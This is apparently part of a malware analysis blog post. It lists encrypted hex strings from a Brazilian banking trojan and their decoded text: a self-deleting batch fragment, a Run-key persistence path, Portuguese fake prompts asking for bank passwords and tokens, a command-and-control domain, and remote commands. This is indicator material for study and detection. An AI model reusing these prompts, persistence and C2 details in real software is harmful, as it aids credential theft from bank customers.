<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C241C43ECD2A4FE566E260</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6BF71952EA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F6050763E301748E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">75FA0D61EA02758480</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">71F9047BD22ABD6D9BF4085F8EC90C3E56</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">57E37EF555A83CE3006FF457E264FF3395E8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6F8584E3778EF9010F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FC0D29402F4691B85738C90DDA7CDC7BE80868</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">5BE9668484E20003</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6AF01346F457FC28C773DF1DD175E81EBB71A69ED41CD975D471914D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">818FB71732AD25010D3AE0648BC3</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F27E99EE78F50113</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">70839CED087AFA69D4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">070E19</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0E172051D9</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">292B394F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F8051061</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8FA5AFCD6E9C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">65FF007389FD74F9</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">4CC97FDE0E4A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">57ED144AF2598CBA698A80D860F06E95CD10C16388</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6EFE017D85E306</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A9BA49A5AAC3333A36</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2C32CF262345B8BF48</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">67F70576F0096AF772FC</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">64FF0C68E51E56</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">41C954AB82FB6B92BE91963FFA72E918B64AE851A54BE16BEA38</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">77839FD6B5C81CC360CF55FD0578D3025CEF126AE31461F559FB1A7384B42D95412D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">4CD45397A7C1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D465F1096083DE0739E801443EA123CB062404</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">DC63E1061550B0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">34C653AA81E27EA65988A0241E4295419E50C5B0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">99A7A5C952A7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D465F1096083DE0739E801443EBD1FD77689A94156FB08598ECC69C5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">050B195DED7189</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">658EBB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ED1537A8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">5EC16FE341</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">50FA21</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BD6C983C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BBA45BF86E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">98BE69FA10</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">4DE911B0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">5738D0022FA3FA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F207136AC121B051F32DDD79C30042E075B497A33E0F26B4194C2B</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A6B441B8B2C820</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A9B14CA38AE46E91F8709530CB0B19C30427D81343F60D03</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D05DF80E17549091ADA1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">202A344B225B8AB15E31369E5A49BC6FE80B33FE57263295CE73A581</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">35C550A786FF5786A28D9A3BC6D529D373B55893C3B2489A8AD90A37A884F65D82B16EDD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D15CF97AF375FE0A111D25</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">60EA778EFD77EE1ECAA5A223DE1CB363E1012CD575C453F46ED20561</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F8011D543BB222C966C95FE7135087BC0726D761FA4AE170A030E410412D5DE715C27DEC</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C04DE80E106A9BA3AD4EED</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">45D56097F60E5980AC8380C078FE5F8DC76486A1221301469F20C8A2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">748690E747BE16C562CD5BFB076FEF1C48E40520A495558595CC0732A38FE36E9343FD6D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">62E36F85</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2436C038176EF921CFA0AEC45142B163FB22D2AD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F6031F5635489F4FFD51DF1606154DEB3BF027C31263F1558E33E540</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">060A19</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">77839FD6B5C81CC360CF5B95EF0244E86887E9</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FB0E285FCE26B159F757D22D17B226035F82B54F58C868E269EE55</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A0A0AC31C82057E962</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E8718DE444A73BDB0C35D571CB3C934380B96394C07382C2D5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0F111F43DA1A64</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">38C25F96F575EC1537EA03463CBC303BB4A59E99</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2535C1391065F018341B1263F3275A8BC36A9AE5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BB4EE8006F86D17997F870819D8ECA69BE74A44195E473D40EB265C1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A5ABB93E33B53F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">4FDB669D8CEF6383A55BF3572D5DE2134BE90824AE708497CD0133D509267A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D15EEA0F1C5C99A7B5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FA0F2B42294A99B96A97B71369993FF75694B673DF0331629C24D172E61C4C9BFA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">45D56097F60E5980AC8389CF6BFC5086DE1E7DE66C84AF2C7F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">48D26F86E51FB66682ED7CDA66F96DA53EFD5D9F3607399F24B3949C21C60E4B2A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">60EA778EFD7DD47DAF51F95D274885B52CC9AF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">AFBB46BDACCF0323C57B93370D63F91EA3593F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">47C946AAB13340D662</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">93A7B3CAA1D4002FDDB24ABF549BEE4ABC618958F045</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D465F1096095C06884EB738094DB2F0A43F456E36085B3E012B05D9A3A11</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CF50DC011855</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1327334A214291B1528FBF1B619CA5568CAE5D25BE75C027BC19C562B5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ED72FE63FB74FE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C257E31B72F16181A35D8DC8B2C0063C9251F13E84A75C4C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C35BE2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EF007E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">42DE5E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">54E6738AE1055C8CA48B9DCA6CE231DF798ABD7FC275CD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8B9FBB331A598C462FD20E1A2BBF062CA3BC6992CE65DD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E163E50A1B0F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">9AA0BA32195A8D472ED30F1B24A4DF085E95B97FE61D2BBCEF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">5AC0AAE7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">53FB29BE61E66688B853F86893306C9330C6</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6184BF1139AD173EE45CF3579E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">28CD66E4044056FC26C861F23CAC2E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">AE5F84DD0D459040EC2FEE648984D70E49</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">92BC62FB134F86BD6A924A9F55F26A94C277A58BDB1EDB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">4CC97FDE0E4A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1A2AD007379DC87FAD45CB0C37A927CC0527DA0C5FF0166498</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0E172051D9</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">353FD8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A1ADBB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">959CAB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0322CDCB63E179E30FCE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">DC7890CE7EDE77AD46F62CAC</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">7A9BB4D27ADA7E</span></div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">They decode as:</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bat</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Erase </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">If exist </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Goto 1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Open</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">TempExe.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">TempExe.zip</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CSIDL_APPDATA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Temp.zip</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">True</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Microsoft\Windows\CurrentVersion\Run</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TB#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Código informado é inválido </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#ASSI#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Assinatura eletrônica informada é inválida </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Número de série informado é inválido </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#NS#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Token informado é inválido</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Token informado é inválido </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TKSMS#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Token informado é inválido </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#ASSI#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Assinatura eletrônica informada é inválida </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Token informado é inválido </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#DTN#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Informaçao de Data é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SN6#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha informada é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TB#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Código informado é inválido</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">iToken informado é inválida </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Informações de Segurança</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SunAwtDialog</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Internet Explorer</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">#32770</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Button</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Advertência de Segurança</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">DirectUIHWND</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CtrlNotifySink</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Permitir</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SN6#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha informada é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">iToken informado é inválida </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#DTN#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Informaçao de Data é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SN6#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha informada é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TB#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Código informado é inválido</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">iToken informado é inválida </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#DTN#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Informaçao de Data é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SN6#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha informada é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">iToken informado é inválida </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha incorreta, insira novamente.</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SN6#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SJAVA#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SN8#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#ASSI#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#ASSI#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SNCARD#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha informada é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Token informado é inválido </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SNCRT#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha certificado informada é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TB#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Chave informada é inválida </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GBPLUGIN</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SCPAD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GBPLUGIN</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SCPAD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">GBPLUGIN</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SCPAD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Internet Explorer</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-#-</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-#-IE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Google Chrome</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-#-CR</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Firefox</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-#-FF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">moparaiso.saves-the-whales.com</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">l1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Microsoft\Internet Explorer\LowRegistry\Blackberry\l1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">p1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Microsoft\Internet Explorer\LowRegistry\Blackberry\p1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">p2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Microsoft\Internet Explorer\LowRegistry\Blackberry\p2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">chave</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PONG#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PING</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CONWATCH</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CR</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">IE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MSG#Visualização Ativada#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EXECUTAPRO</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ATUALIZAPRO</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">NOVOLINK</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">NOVASPORTAS</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">LINKPORTAS</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">LINKDEF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">l1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Microsoft\Internet Explorer\LowRegistry\Blackberry\l1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PORTASDEF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">p1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Microsoft\Internet Explorer\LowRegistry\Blackberry\p1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">p2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Microsoft\Internet Explorer\LowRegistry\Blackberry\p2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">LINKPORTASDEF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">STOPWATCH</span></div>
